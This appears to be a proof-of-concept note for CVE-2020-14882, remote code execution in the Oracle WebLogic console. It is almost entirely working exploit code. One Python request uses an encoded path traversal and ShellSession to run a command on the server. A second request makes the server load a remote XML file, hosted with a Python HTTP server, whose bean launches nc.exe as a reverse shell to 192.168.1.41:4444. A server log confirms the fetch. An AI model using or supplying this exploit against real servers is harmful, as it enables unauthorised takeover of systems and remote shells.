CVE-2020-14882

coherence shellsession calc.exe

import requests

url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
              '?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession' \
              '(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)'.format('192.168.1.53', '7001')
response = requests.get(url)

FileSystemXmlApplicationContext reverse_shell with nc

Start web server with the following poc.xml:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>C:\temp\nc.exe 192.168.1.41 4444</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

$ python3 -m http.server

import requests

url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
              '?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
              '(%22http://192.168.1.41:8000/poc.xml%22)'.format('192.168.1.53', '7001')
response = requests.get(url)
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.53 - - [30/Oct/2020 07:00:12] "GET /poc.xml HTTP/1.1" 200 -